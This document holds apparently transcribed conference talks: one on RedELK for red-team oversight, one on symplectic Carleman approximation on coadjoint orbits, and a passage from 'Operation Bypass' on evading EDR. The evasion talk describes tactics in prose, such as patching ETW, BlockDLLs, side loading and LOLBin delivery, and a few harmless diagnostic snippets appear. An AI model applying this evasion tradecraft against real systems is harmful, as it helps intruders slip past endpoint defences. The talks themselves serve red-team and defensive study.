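For the certificate check mentioned above, a minimal sketch would be to compare the fingerprint of the certificate presented for a site you control against a known-good baseline, so that a sudden change hints at SSL interception being switched on along the path. The hostname and the baseline value are placeholders; RedELK's own implementation of this check may look different.

import hashlib, socket, ssl

HOST = "www.example.org"                      # a site you control and have baselined
KNOWN_SHA256 = "put-your-baseline-fingerprint-here"

def cert_fingerprint(host, port=443):
    # Grab the leaf certificate exactly as presented to this network path.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE           # we only want the raw cert bytes
    with socket.create_connection((host, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            der = tls.getpeercert(binary_form=True)
    return hashlib.sha256(der).hexdigest()

fp = cert_fingerprint(HOST)
if fp != KNOWN_SHA256:
    print(f"[ALARM] certificate changed for {HOST}: {fp} (possible TLS interception)")
else:
    print("certificate matches baseline")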
Looking at the internal side, we can check for the password resets and for TLS interception. Another one that we have already included is the security tool checks: an unexpected change, for example new AV or EDR tooling being installed, is a clear indicator that all of a sudden they have done something for further investigation. We are working on checks for log forwarding, security config, as well as account logons. With log forwarding: if there is a change, all of a sudden WEF is being enabled or Winlogbeat is being enabled, things like that, it is a clear indicator that something has changed that you need to be aware of and that is most likely related to blue team activity. We can also check for very specific security config changes. That is a very broad topic, but it is a category that needs to be mentioned: if you have an implant doing some checks, you can check many different security parameters and local security policies, and if those change, why would they be changing during an operation? And then there is an unexpected change in the accounts that are logging in. If you land on a box and you go through the Windows event viewer for the past 10 or the past 100 logons, you will most often see a clear pattern of which accounts log into this machine. If all of a sudden you see service accounts logging in, or all kinds of different things, then in my view that is an indicator that you are not as stealthy as you think. How to get started. We need to tell you a few things on the planning side. A RedELK installation is intended per operation; it can contain multiple attack scenarios, but it is for one client, if you like. So do not mix clients, do not make one central RedELK server where you put everything together. You want a new system per operation, because it contains highly confidential data, and you want a new system after the operation. It has three main components: the RedELK server itself, a connector that you install on your C2 servers, and a connector that you install on your redirectors. There are several important identifiers used during the operation, and you want to make them clear at the beginning of the installation: the attack scenario name that you use, as well as the component name. The component name is relevant for the C2 servers and redirectors, and the attack scenario as well; those are also parameters that you need to pass to the installer on the C2 server as well as on the redirector. An important thing to know, and I mentioned it before, is that the default logging of Apache or HAProxy or any other type of reverse proxy is not sufficient. On the wiki, which is on GitHub, and in the blog post series, we have explained, and we put example configs in the RedELK code as well, how you change the logging, specifically for Apache, to include header logging and the explicit names of the frontend and the backend. Things like that are already in there, but you need to enable it, otherwise RedELK is blind to traffic data. Then you do the installation: you get the release from GitHub, or you can just try the master branch, whatever you like. Then there is a first step of creating certificates and the installation packages for the ELK server, the C2 servers, as well as the redirectors; you do that with the initial setup. You generate certificates that are used for the transport of the data from those other components back to the RedELK server; it is TLS encrypted.
You need to configure that, and from there on you run the installers on your redirectors, on your C2 servers, as well as on the main RedELK server. Very important: there are post-installation configurations that need to be done, and you will find them on the ELK server in the specific location you will see there. That is where you enable specific alarms and other kinds of things, and it is all explained in the documentation that we have both on GitHub as well as in the blog post series. A little bit about the roadmap. Version 1, which was 2018-2019 I believe, focused mainly on oversight and not very much on the alarms; we had support for Cobalt Strike, and for HAProxy as well as Apache redirectors. Version 2, which we have been working on since 2019 I believe, is still at a beta stage but almost there. It is a major improvement, both on the setup, but mostly on the types of alarms as well as the OPSEC data and the supported tech: a lot more C2s are supported, PoshC2, but also nginx, and our own C2 framework. And of course, like I mentioned, we have the integrated Neo4j and the Jupyter notebooks. It is in constant development: more alarms, more improved dashboards, things like that, and we are also working on other C2 frameworks; you are welcome to join us if you like. In summary, we believe red teaming exists to make blue teams better; that is why we do proper sparring, and having insight into the movements of your opponent during a sparring fight is simply better. RedELK helps you with that specific case: it will help you to see the activities that the blue teams are doing. And dear blue team, think of your OPSEC, because red teams can make use of RedELK. You will find it on GitHub, and you will find information about this also on our blog. And with that, I would like to thank you for your time.
Blue teams and CERTs are increasingly better equipped and better trained. At the same time offensive infrastructures are increasingly diverse in components and growing in size. This makes it a lot harder for red teams to keep oversight but also a lot easier for blue teams to react on the traces that red teams leave behind. However, do blue teams really know what traces _they_ leave behind when doing their investigation and analyses? RedELK was created and open sourced to help red teams with these two goals: 1) make it easy to have operational oversight, 2) abuse blue team OPSEC failures. Come to this talk to learn about blue team detection and how RedELK can help you.
10.5446/54148 (DOI)
Thanks to the organizers for inviting me. Yes, so I'm going to talk about symplectic Carleman approximation on coadjoint orbits. The starting point is a question asked by Nassim: if you take a smooth, C-infinity smooth, symplectomorphism of R2n, and R2n sits inside C2n, then the question is whether this is approximable in the sense of Carleman by holomorphic symplectomorphisms of C2n leaving R2n invariant. And of course symplectic on R2n just means that phi preserves this symplectic form, and then the analogous thing in the holomorphic case. And what does this Carleman approximation mean? It means that for any continuous, strictly positive function epsilon on R2n, there should exist a holomorphic symplectomorphism psi of C2n, preserving R2n, so that psi approximates phi to precision epsilon(x) for x on R2n. So the point is that this is much more than uniform approximation, or even approximation on compacts, since this epsilon can go to zero as fast as you want as x goes to infinity. And you can also, we will do that later, throw in some derivatives that you want to approximate. So anyhow, I thought I would start, before discussing this, by going through a little bit of the history of Carleman approximation for functions, in case many of you have not seen that before. So, a little history. This is not Carleman approximation, but something maybe all of you know: Weierstrass proved that any continuous function on an interval [a,b] is uniformly approximable by polynomials. Runge's theorem tells you that if K is a compact set with C minus K connected, then any function f holomorphic on K, and this means holomorphic on a neighborhood of K, may be approximated by polynomials. And then comes this theorem of Carleman, which is a generalization of Weierstrass, telling you that you can replace the closed interval by the real line. There is the corresponding statement that I had before: any continuous function on the entire real line can be approximated to precision epsilon(x), where epsilon is a continuous, strictly positive function. Maybe such a theorem is a bit surprising if you did not see it before, but given a slight generalization of the two theorems above it is very easy to prove, so I thought I would give a short sketch for later. Well, you need a combination theorem, a Mergelyan-type theorem, but you can just imagine: you have a disc of radius r in the complex plane and you consider the real line R, and I start with a continuous function f which is holomorphic on this disc and continuous on the real line. Assume you have a combination of those two theorems above, so just assume that there exists a sequence of polynomials G_j converging to f on the closed disc of radius r union the closed disc of radius r+2 intersected with R. So I assume that I can approximate the given function on that disc union such an interval. Then you take a cutoff function chi which is 0 on a neighborhood of the disc of radius r+1 and equal to 1 once you come outside the disc of radius r+2; you choose such a cutoff function, and you just write H_j equal to G_j plus chi times (f minus G_j). This function is going to converge to f uniformly on the real line, it approximates the original f on the disc, and it is holomorphic on the disc of radius r+1. So now you can imagine that you put this into an inductive procedure and you get this approximation result here.
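To pin the sketch above down in symbols (this is only a reconstruction of the verbal argument, with D(r) the open disc of radius r), the Carleman statement on the real line and the gluing step read roughly as follows.

\[
  |f(x) - g(x)| < \varepsilon(x) \qquad \text{for all } x \in \mathbb{R},
\]
% for some entire function g, given f continuous on R and a continuous epsilon > 0.
% Gluing step: with G_j -> f uniformly on \overline{D(r)} \cup (\overline{D(r+2)} \cap \mathbb{R})
% and a cutoff \chi with \chi \equiv 0 near \overline{D(r+1)} and \chi \equiv 1 outside D(r+2), set
\[
  H_j \;=\; G_j + \chi\,(f - G_j),
\]
% so H_j = G_j (holomorphic) near \overline{D(r+1)}, H_j = f on \mathbb{R} \setminus D(r+2),
% and H_j -> f uniformly on \mathbb{R}.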
So that was just to emphasize that when we deal with this kind of thing there are two steps: one is that you have to prove a local, compact approximation result, and then you need some inductive procedure to pass to a limit. Okay, anyhow, keep that in mind for later. That was Carleman; more generally it was proved by Keldysh and Lavrentiev, and this is a complete characterization, that a closed subset X of the complex plane satisfies Carleman approximation if and only if it has no interior and the complement is connected and locally connected at infinity. All right, so that is one complex variable. A little bit closer to our case: Rn inside Cn satisfies Carleman approximation, and the proof is not much harder than this, it is quite simple. Moving away from flat things, it is known that a smooth unbounded curve always admits such approximation, and a bit more generally locally rectifiable curves. However, moving up to higher-dimensional submanifolds, things change in several complex variables, because there are polynomially convex totally real submanifolds which do not admit Carleman approximation. These admit approximation on compact sets, they can be exhausted by polynomially convex sets, but there is some global business going on that prevents Carleman approximation from holding. And if you go back to the Keldysh-Lavrentiev characterization, you see that they require, it is necessary, that the complement is locally connected at infinity, and somehow, well, it is not quite correct to say, but that is what goes wrong in this case, except that locally connected at infinity does not make sense in this setting, so you have to reformulate. And if you reformulate what that means, you can completely characterize the totally real submanifolds of Cn which admit Carleman approximation: they have to be polynomially convex and, I am not going to explain this, have something called bounded exhaustion hulls. But this is certainly something that holds for Rn in Cn, and in particular for R2n in C2n. All right, moving to holomorphic maps: it is known that a proper smooth embedding from R to C2 can be approximated in the sense of Carleman by proper holomorphic embeddings of the complex plane. And it is known, and this is a little closer to what we are going to discuss today, that if you are in Cn and you look at, I am not going to be too precise, you choose k strictly less than n, and you assume you have a totally real manifold M that is, let us say, essentially equal to Rk, so it does not matter what it looks like in a bounded part, but it should look like Rk near infinity, then if you choose a smooth embedding of this M which is the identity on M outside a compact set (maybe unfortunate language), you can approximate it in this Carleman sense by holomorphic automorphisms of Cn. All right, and then finally the result of today. This is joint work with Fuxiang Deng. Precisely, it is a positive answer to the question we started with: you take a symplectomorphism phi of R2n, you let epsilon(x) be a strictly positive continuous function, and you fix an integer k; then you can Carleman approximate phi by holomorphic symplectomorphisms, also with derivatives up to order k.
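Written out symbolically (again just a rendering of the statement given in words above), the main theorem says:

\[
  \begin{aligned}
  &\text{For every smooth symplectomorphism } \varphi \colon \mathbb{R}^{2n} \to \mathbb{R}^{2n},
   \text{ every continuous } \varepsilon \colon \mathbb{R}^{2n} \to (0,\infty)
   \text{ and every } k \in \mathbb{N}, \\
  &\text{there is a holomorphic symplectomorphism } \Phi \text{ of } \mathbb{C}^{2n}
   \text{ with } \Phi(\mathbb{R}^{2n}) = \mathbb{R}^{2n} \text{ such that} \\
  &\qquad \bigl|\partial^{\alpha}(\Phi - \varphi)(x)\bigr| < \varepsilon(x)
   \quad \text{for all } x \in \mathbb{R}^{2n},\ |\alpha| \le k.
  \end{aligned}
\]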
All right, so this is very different, also because of the requirement that R2n is left invariant. This is a little different from the earlier situation: there it was necessary to assume that k is less than n; here it is not, it is exactly the same number. Here 2n plays the role of k, so the totally real guy has maximal dimension and you want to leave it invariant; that was not what we did there. All right, so this is the main theorem, but it is a special case of a more general result: you can produce many more totally real submanifolds of complex symplectic manifolds for which such theorems hold, so I am going to start by describing a more general setup. Sorry. Yes, yes, yes, I don't think you can. This is the order of the derivatives; I think if you specify k first you could say that phi has to be C^k plus something, you are going to lose some derivatives. All right, so in the title I had coadjoint orbits, so I am going to say something about that. I start with a Lie group and I look at the tangent space of the group at the identity. If you fix an element g of the Lie group, you have a conjugation map, this is just standard, and this conjugation map fixes the identity, which means that its differential acts on the tangent space at the identity; that differential is called the adjoint action of g on the Lie algebra. All right, but you want the coadjoint action, so now you want an action on the dual space, on the cotangent space, and you define it by duality: you say that Ad-star at the point g, applied to a covector xi and paired with a tangent vector v, is defined by taking the adjoint action of the inverse and letting the covector act on that. All right, so you get an action on the dual space. And as soon as you fix such a xi and let the whole group G act on it, you get an orbit: a smooth submanifold of the dual space, not necessarily closed, but I am only going to consider closed ones in this talk. And what does this have to do with the question? Let us look at an example: take the Lie group, say a real Lie group, consisting of matrices like this; this you identify with R3, the tangent space you identify with R3, and if you just compute what the coadjoint action is, it is given by this. So for a and b this is the coadjoint action, and you see that c is gone, there is no c, and you also see that if you fix the third coordinate, then the orbit is just going to be an R2 as you vary a and b in R2, so you get the flat R2 sitting inside R3. So that is the coadjoint orbit R2, and if you complexify this group, you just throw in complex coefficients instead, then you get the coadjoint orbit which is the complexification of that R2. So R2 sits inside C2, and that is the special case we considered before: R2, with n equal to 1, sits inside C2 and we want to do approximation. But at this point we have not introduced a symplectic structure yet, so what do you do? Let us see how we get some vector fields; I want to define some vector fields on my coadjoint orbit, and then I want to define a symplectic form afterwards. If you take a v in the Lie algebra, you can consider the exponential map e^{tv}, you can take the coadjoint action of this exponential, and you can apply it to a point xi in the dual space.
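In symbols, the coadjoint action and the orbit described above are (a transcription of the verbal definitions, with g the Lie algebra and g* its dual):

\[
  \langle \operatorname{Ad}^{*}_{g}\,\xi,\; v \rangle
  \;=\; \langle \xi,\; \operatorname{Ad}_{g^{-1}} v \rangle,
  \qquad g \in G,\ \xi \in \mathfrak{g}^{*},\ v \in \mathfrak{g},
\]
\[
  \mathcal{O}_{\xi} \;=\; \{\operatorname{Ad}^{*}_{g}\,\xi : g \in G\} \;\subset\; \mathfrak{g}^{*}.
\]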
So this one-parameter family starts, for t = 0, at your point xi, and then you flow inside your coadjoint orbit, and if you differentiate you get a vector field. So I just take d/dt at t equals 0 and I get a vector field, and it is complete; note this for later: it is defined by differentiating a flow, so it is a complete smooth vector field if we look at a real coadjoint orbit, or holomorphic if we look at the complex one. All right, and this is also important for later: we now have lots of complete smooth or holomorphic vector fields on our coadjoint orbits, obtained by differentiating these flows. Then, for two such vector fields, you want to define the symplectic form: at the point xi you take the Lie bracket of the two generators of the vector fields, which is a new tangent vector, and then you let the covector xi act on this bracket. Of course there is something to prove, that this is a symplectic form, but it is a symplectic form; I am not going to prove that, it is a standard thing, and the point is that the vector field we had above is Hamiltonian: it satisfies that the contraction of omega with X_v is closed, so it is a symplectic vector field. But now comes the important thing for us: you can also define a symplectic, or Hamiltonian, vector field by using potentials. You take a smooth function f on your symplectic manifold, and if you can find a vector field X satisfying that df is the contraction of omega with X, then X is a symplectic vector field with potential f. And now comes the important point, I think I have it on the next slide, but I can say it now: this complete vector field has a potential, and the potential is v. So v is something in the Lie algebra, it can act on the dual space, so it is a function, and if you use it as a potential you just get that vector field back. So this is the important thing: all linear functions on your coadjoint orbit are potentials for complete vector fields. So now, yes, I am going to forget the orbits a little bit. What we are going to do is look at real coadjoint orbits, similar to the Heisenberg group example, sitting inside complex coadjoint orbits as closed submanifolds, and we have this property. So I am just going to forget the orbits and formulate a general framework, which is quite simple. I am going to say: okay, we are in Cn = Rn + iRn, I assume I have a closed complex submanifold Z, I intersect it with Rn and get a smooth closed manifold Z0, with real dimension equal to the maximal totally real dimension inside Z. I assume I have a symplectic form on my complex manifold, such that when I restrict to the real one I get a real symplectic form, and I assume that whenever I take a linear function on Cn and use it as a potential for a Hamiltonian vector field on Z, that vector field is complete. Those were the crucial facts for the coadjoint orbits we had before, and this is certainly the case for R2n sitting inside C2n.
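The objects just described, written out (again only a symbolic rendering of the verbal definitions):

\[
  X_{v}(\xi) \;=\; \frac{d}{dt}\Big|_{t=0} \operatorname{Ad}^{*}_{\exp(tv)}\,\xi,
  \qquad
  \omega_{\xi}\bigl(X_{v}(\xi),\,X_{w}(\xi)\bigr) \;=\; \langle \xi,\,[v,w]\rangle,
\]
\[
  \iota_{X_f}\,\omega \;=\; df,
  \qquad
  f_{v}(\xi) := \langle \xi, v\rangle \ \Longrightarrow\ X_{f_v} = X_{v}
  \ \text{(complete, since it integrates to the coadjoint flow).}
\]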
All right, so let us see, this is going a bit faster than I thought; let us try to look at this approximation of a symplectomorphism of the real Z0. As I said, there are two things you have to do: you need to prove a local approximation statement, something on compacts, and then you need some inductive scheme to build the global object as an inductive limit. Somehow the induction scheme gets a little complicated, a little messy, so I am just going to explain the compact approximation, and then maybe we can indicate the rest later. Okay, so what do we do? Now I have to make an assumption: if I am on R2n and I have a symplectomorphism phi, and if it fixes the origin, I can put phi_t(x) = (1/t) phi(tx). This is an isotopy of symplectomorphisms, so that for t = 0 you have the identity map and for t = 1 you have your original phi. So any symplectic diffeomorphism of R2n is in the C-infinity path-connected component of the identity; this holds on R2n. If I work in the abstract setting, I just have to assume that I start with a symplectomorphism which is in the path-connected component of the identity; that simply has to be an assumption. So we take this phi_t, and you can interpret phi_t as the flow of a time-dependent vector field; you just differentiate with respect to t. So now your goal is to approximate the flow of a time-dependent vector field, living on your real coadjoint orbit, or real Z0. It is a standard thing that if you divide your time interval into many, many small intervals, fix the time at the endpoints of these small intervals, and consider the flows of the resulting time-independent vector fields, then you can approximate the flow of the time-dependent field by composing flows of time-independent vector fields. So now you can forget about the time and ask to approximate a time-independent vector field. All right, so now X is a time-independent Hamiltonian vector field. Now I have to make another assumption, namely that my Z0 is simply connected, because then I can find the potential: the smooth vector field X has a potential f, and that potential can be approximated by real holomorphic polynomials p(z), just holomorphic polynomials with real coefficients, since Z0 sits inside Rn. So now I have a real holomorphic polynomial p(z), and since it is real, if I use the polynomial as a potential for a new vector field, that vector field is going to be tangent to the real Z0. So I get a holomorphic vector field on the big complex manifold which is tangent along the real Z0. All right, so now I have a polynomial, and it is a standard thing that any polynomial in a number of variables can be written as a sum of powers of linear forms on Rn or Cn; here lambda_j(z) is just a linear form on Cn. Now you use the assumption: I assumed that if you forget the power m_j and just use the linear form lambda_j as a potential, then you get something complete. That was the assumption, which we had automatically for the coadjoint orbits. But this means that lambda_j to the power m_j, used as a potential, is still complete, because lambda_j is constant along the flow curves of the vector field you get from lambda_j, hence so is lambda_j to the m_j, and the field is still going to be complete.
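The decomposition used here, in symbols (reconstructed from the argument above; the constants c_j can be absorbed into the linear forms if one likes):

\[
  p(z) \;=\; \sum_{j=1}^{N} c_j\,\lambda_j(z)^{m_j},
  \qquad
  X_{p} \;=\; \sum_{j=1}^{N} c_j\, X_{\lambda_j^{m_j}},
  \qquad
  X_{\lambda_j^{m_j}} \;=\; m_j\,\lambda_j^{\,m_j-1}\, X_{\lambda_j},
\]
% and since \lambda_j is constant along the flow of X_{\lambda_j}, each
% X_{\lambda_j^{m_j}} is complete whenever X_{\lambda_j} is.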
So now if you use each component of p as a potential individually, what you have done is write X as a sum of complete holomorphic vector fields, and they come from real polynomials, so they are tangent to Z0. And then you are done approximating on a compact set, because it is a standard thing that if you have a sum of vector fields, smooth or holomorphic for that matter, and you want to approximate the flow, then you can flow along the individual vector fields for small amounts of time and compose, like this here, so that when n goes to infinity you approximate phi_t. And each of the individual factors here is a symplectic diffeomorphism, because they are time t/n flows of complete Hamiltonian vector fields. All right, so this means, and I am not really going to go into detail: you start with Z0 sitting inside some larger complex manifold Z, you have the diffeomorphism phi, you choose a compact set K1, and what we achieved was approximating phi on this particular compact set. But this approximation, call it psi_1, is going to do something arbitrary outside, so this is not really good, you have to correct it. So you rather consider psi_1 inverse composed with phi, because if you compose that with psi_1 you are back in business; so now you try to approximate this and thereby correct your original approximation, and then you set up an inductive scheme to exhaust all of Z0. Of course you have to take care that your sequence of maps also converges to a diffeomorphism of C2n, and that makes it a little tricky, but that is basically the idea, and I think I am actually done. So thank you.
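For reference, the composition step invoked in the compact approximation above, in symbols (a reconstruction of the "flow along the individual fields for time t/n and compose" statement):

\[
  \varphi_t \;=\; \lim_{n\to\infty}
  \Bigl(\phi^{1}_{t/n}\circ\phi^{2}_{t/n}\circ\cdots\circ\phi^{N}_{t/n}\Bigr)^{n},
\]
% where \phi^{j}_{s} is the time-s flow of the j-th complete Hamiltonian field in the
% decomposition X = X_1 + \dots + X_N; each factor is a holomorphic symplectomorphism
% preserving Z_0, so the compositions approximate \varphi_t on a given compact set.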
For a complex Lie group G with a real form G0⊂G, we prove that any Hamiltionian automorphism ϕ of a coadjoint orbit O0 of G0 whose connected components are simply connected, may be approximated by holomorphic O0-invariant symplectic automorphism of the corresponding coadjoint orbit of G in the sense of Carleman, provided that O is closed. In the course of the proof, we establish the Hamiltonian density property for closed coadjoint orbits of all complex Lie groups.
10.5446/54347 (DOI)
Hello and welcome to my talk, Operation Bypass: Catch My Payload If You Can. My name is Matthew; I'm a technical manager at Optiv under the adversarial services practice. I'm primarily a lead there, and my role focuses on red teaming, purple teaming, basically any type of adversarial, real nation-state-style attacks. I've also authored numerous open source tools and frameworks. A lot of the research I've done has been focused on evasion, bypasses, and circumventing EDR and other endpoint-based controls and security. I'm also a Microsoft Hall of Famer related to several disclosed Microsoft COM bypasses, and I've spoken at numerous places including DEF CON's Red Team Village, DerbyCon, BSides Las Vegas, RSA and others. Just a brief overview of the agenda we're going to cover today. First we're going to understand the level of detection, look at some OPSEC considerations, and understand some TTPs for the modern era. Then we'll focus in on using ScareCrow, a framework for bypassing endpoint detection tools, drill more into the indicators of compromise that can lead to a detection, or any type of artifacts when we're talking about command and control servers, and then introduce a new tool to help with those C2 profiles. To begin: this is a fairly common diagram to depict the red team lifecycle. We're really going to focus today on the C2 and all the aspects of it, from establishing that presence, to making sure you don't get detected, to your long-term longevity that leads eventually into post-ex techniques. But first let's define endpoint detection and response tools. How do they actually detect us and subsequently prevent our attacks? They primarily rely on a series of different combinations these days: userland hooking being the most common, kernel callbacks, ETW events, or the moniker of machine learning and AI, which I put in quotes, because a lot of times when we get down to it, it's usually signature-based, or a combination of the three with something else in the background. Not to dispute that there is any value to machine learning and AI, it's just that oftentimes when we see this marketed as a tool to prevent threats, it's usually not the whole truth, and so there are a lot of misconceptions about it. So with that in mind, how do we get around it? Well, the most common thing has been process injection, but in the more recent, modern landscape we're going to things such as using custom system calls, using a technique called BlockDLLs, which we'll go into in a little bit, and also more and more undocumented API calls. I've posted a link here for a good buddy of mine; he does an amazing bit of research and he has a great project called AlternativeShellcodeExec. It focuses on using alternative API calls and kernel callbacks to execute shellcode in ways that are not the normal way, and this by nature allows us to circumvent the normal detections and therefore establish a presence without being detected, because these are alternative paths, so EDRs and other tools are often not watching them as a point to detect malicious activity.
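Since userland hooking comes up repeatedly here, a quick sketch of how one might eyeball whether an EDR has hooked the usual ntdll exports: on unmodified x64 Windows these stubs start with mov r10, rcx; mov eax, <syscall number> (bytes 4c 8b d1 b8), so anything else at the start suggests a trampoline. This is Windows/x64 only, ctypes-based, and purely illustrative; it is not how ScareCrow or any particular EDR check is implemented.

import ctypes
from ctypes import wintypes

k32 = ctypes.WinDLL("kernel32", use_last_error=True)
k32.GetModuleHandleW.restype = wintypes.HMODULE
k32.GetModuleHandleW.argtypes = [wintypes.LPCWSTR]
k32.GetProcAddress.restype = ctypes.c_void_p
k32.GetProcAddress.argtypes = [wintypes.HMODULE, ctypes.c_char_p]

ntdll = k32.GetModuleHandleW("ntdll.dll")
for export in (b"NtAllocateVirtualMemory", b"NtProtectVirtualMemory", b"NtCreateThreadEx"):
    addr = k32.GetProcAddress(ntdll, export)
    stub = ctypes.string_at(addr, 8)              # first bytes of the syscall stub
    clean = stub.startswith(b"\x4c\x8b\xd1\xb8")  # mov r10, rcx; mov eax, imm32
    print(export.decode(), "clean" if clean else "possibly hooked", stub.hex())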
So, BlockDLLs: this has been a very common and a great technique. It is essentially a technique where you can set your process to have a flag, and this flag says: only allow Microsoft-signed DLLs. That means that only system-level DLLs such as ntdll, kernelbase and kernel32 are allowed to be loaded into our process, which means, frankly, that an EDR product can't load its DLL into our process to then subsequently detect our activity. So, their response to our attacks: they've started getting their DLLs signed by Microsoft. Yeah, that allows them to still load in, even with that flag. Deploying whitelisting controls as a feature, rather than traditional blacklisting, so whitelisting where you block everything and only allow certain applications, has been very effective, as binary-based attacks no longer work. These whitelisting rules often use hashes, so it's really hard to imitate a legitimate hash of, say, cmd with your implant. Another kind of control: XDR. This is just endpoint detection tools' way of gathering telemetry from different aspects rather than just the endpoint, looking at the network behavioral traffic, what's egressing, and activity between hosts to determine a baseline of malicious or suspicious activity, such as wmiexec calls or anything along those lines that maps to techniques an attacker would use, or things that are out of the norm for that user, really heavily emphasizing the baselining of activity. So, our response to their response. One of the things that I preach, with more and more EDR vendors having their DLL signed by Microsoft, is just to avoid BlockDLLs as a whole, especially for the initial foothold, but also for post-ex techniques. There are a lot of great techniques coming out right now as a replacement, and avoiding it helps prevent us from being detected, because that flag of only loading Microsoft-signed DLLs doesn't really blend in: when we're talking about trying to blend in, that flag itself can stick out like a sore thumb, drawing more attention to our process than we actually want. With regards to whitelisting controls, we'll talk a lot more about this, but: avoid process injection in favor of a technique called side loading, and we're going to get into that later. With regards to XDR controls, this is really where the interesting stuff about blocking or in-memory patching of ETW events comes in. Since ETW telemetry like this isn't enforced from outside our process, how these things work is that when they run, they have to start emitting that telemetry from within the process, and there are no additional resources loaded, so by patching, terminating or tampering with them, they don't send the right information and therefore these controls don't really work. And so this really comes down to the cat and mouse game, and how do we get better? Really, at the end of the day, it comes down to: how are we generating that alert? How are teams seeing us? It's not always the shellcode's or the implant's fault. There are a lot of different phases that get to the point of that shellcode running that can often be the catalyst for the trigger, and we really need to understand this chain of
events, in order to identify where we need to improve our tradecraft. When we look at this, the breakdown I like to run with is: there's the delivery, the loader, and the implant. The delivery is the mechanism you use to get your loader onto the box, most commonly things like mshta, bitsadmin, anything that allows you to download or pull your code from a remote or local resource onto the desktop. So that's one area. The second area is the loader itself. Whether it be a binary, a DLL, a JScript file, what have you, this is the file that contains your implant as well as whatever techniques you're going to introduce, whether it be anti-sandboxing, anything for unhooking DLLs, or a decryption technique. These are the things that happen inside the process before your actual implant runs. I like to define the implant as the shellcode, or in Cobalt Strike the reflective DLL, that runs in memory and is essentially responsible for establishing that remote connection out. So once we have these three things defined, we need to understand what's detecting us. I like to break it down into two things. Behavioral, which really comes down to EDRs: EDRs really like to focus on behavioral indicators. I have the example up here of Excel spawning cmd.exe; that's a behavioral thing. But there's also signaturization: as much as we dismiss it, signature-based detection, such as the historical antivirus agents, still comes into play when detecting things like large base64-encoded blocks of strings or shellcode. But what is harder to understand, and often the more common reason that leads to an event, is actually something like a human interaction, a SIEM, or some kind of SOC tool that's monitoring for events. This can be something like files being dropped in a location such as temp and then a process spawning from a weird location, to something even more abnormal, such as an alert that says, hey, we're seeing a lot of egress to a new destination, and tracing it back, this is a conference room PC, so why is it calling out at three in the morning? These are all taken from real-life red team operations where there has been some kind of generated alert, and the lessons here are sometimes really simple, like tell a more convincing story, but others are more technical, where you have to apply more advanced techniques to bypass that technical control. So, the detections. These are the most common gotchas that I mentioned; I like to break them down into four things to really focus on when I'm developing an attack. What is the command I'm executing?
So obviously, these days, things like PowerShell or bitsadmin are very highly indicated. There's been a lot of research, they're very prominent LOLBins, so by focusing on and using them there's a high chance that there is some kind of rule or mechanism out there looking for their execution. Now there are a couple of things you can do to obfuscate that, and that's really where you have to understand what you're going up against, as well as being mindful of the file type. Obviously, if you're downloading a binary straight from some random location, there are going to be things that pass through web proxies, so defenders have external control and they can see that large data stream, and binaries have a universal header, so it's easy to detect. These are all things you have to be mindful of when you're setting up this attack chain. Also watch for abnormal behavior; this one's a little harder to discern, but what I like to say is that if you're going to start using commands, LOLBins, you have to understand who you are. Is your user a standard user, or is your user someone that would plausibly use this, so that if a security team were looking at it they wouldn't bat an eye? It's really about blending in and telling that story. And finally, whitelisting controls. When I talk about whitelisting controls, we have to really understand what's there. Oftentimes you have the greatest attack chain ever, but if they block your ability to run something, you'll never know it; especially in a black-box situation, the beacon may not come home, your implant and your C2 essentially won't fire, and you don't know where that detection is. So if I can leave you with one thing when we talk about detections, it's this: detections are really easy to trigger, but they can be impossible to understand unless you have the ability to look at the alert and understand what it's triggering on, and sometimes that can only be learned through life lessons and experience. Now let's talk about an example situation, using a Cobalt Strike C2. Let's say PowerShell scripted web delivery, so a PowerShell script that remotely downloads and establishes a beacon. This happens, the beacon calls home several times before the operator even executes a command; the first command they run is whoami, and all of a sudden the beacon stops calling home. So let's take a look and follow this flow. Here we see the chain: cmd was used to spawn PowerShell, something in PowerShell was executed, and then whoami was the last process. When we look into it, we see that, first and foremost, the PowerShell script, while it was an event, didn't give them enough information right there. They believe there's something malicious and it has the characteristics, but it's not confirmed; they still need more data. These EDR products don't want to jump the gun or terminate, because it can actually impact business. They need the right information, because if they terminate everything like that, the product cannot be used in that environment, no one's going to use it, so they need more data points to make that decision. The next alert: okay, now it's a bit more severe; they see there's a base64-encoded command and it appears to be malicious, but there are not enough indicators right now for them to know what's going on, because sometimes this could be a false positive. And then the final one: we see a recon command, obviously whoami was used, and with all of this combined, that is where the alert comes from.
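As a toy illustration of the "enough data points to make a decision" behaviour described above, here is a minimal correlation sketch: individual events carry a score, and only the combined chain crosses the alert threshold. The event names, scores and threshold are invented for illustration; no real EDR or SIEM rule set is being reproduced.

# Toy behavioural correlation: single events stay below the alert
# threshold, the combined chain does not.
SCORES = {
    "powershell_download_cradle": 40,   # suspicious but common enough
    "encoded_command":            30,
    "recon_command_whoami":       35,   # harmless alone, damning in context
}
ALERT_THRESHOLD = 80

def evaluate(process_chain):
    total, reasons = 0, []
    for event in process_chain:
        if event in SCORES:
            total += SCORES[event]
            reasons.append(event)
    verdict = "ALERT/TERMINATE" if total >= ALERT_THRESHOLD else "monitor"
    return verdict, total, reasons

chain = ["powershell_download_cradle", "encoded_command", "recon_command_whoami"]
print(evaluate(chain))       # crosses the threshold only once all three are seen
print(evaluate(chain[:1]))   # the download cradle alone is just 'monitor'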
So we see this breakdown: it wasn't necessarily that the scripted web delivery was the catalyst; it was simply that enough behavioral indicators had been tripped for something to occur. So once again, oftentimes the implant is not the primary cause of the detection; it can sometimes be post-ex techniques. So when you are looking at this, and you're establishing a foothold, you have to be mindful that just because you have a foothold doesn't mean you're free and clear. There are often secondary controls that can trigger, that can lead to a preventative measure and a loss of a beacon. So it's really important to understand, even if you're successful, how you are successful. Are they still watching? Are you fully flying blind? Do they have enough information? Is there something they're waiting for? Even if you're using the latest techniques, if you're using a very common catalyst, like a delivery command that's highly indicated, you can get caught really easily, and thus those highly undetectable techniques will never really be used. I like to call this fruit of the poisonous tree, because if they're already onto you for the first initial call, once again, let's say PowerShell, everything subsequent is already suspect. So going back to that event: whoami was just the tipping point. There was enough information from there, because from the behavioral standpoint whoami suggests recon, and with everything in that attack chain it was enough to discern and confirm, based on the fact that whoami was run, that the PowerShell activity was indeed malicious. Why did they do it that way? Why didn't they just instantly block PowerShell? Because PowerShell, as much as we abuse it, still has legitimate business uses for IT and administration, so completely terminating it doesn't actually work; you need more points to make a decision. I also want to call out, as an OPSEC consideration, to avoid PowerShell at all costs. These days C# tools pretty much cover the gamut of everything; C# is highly flexible, it's easier to 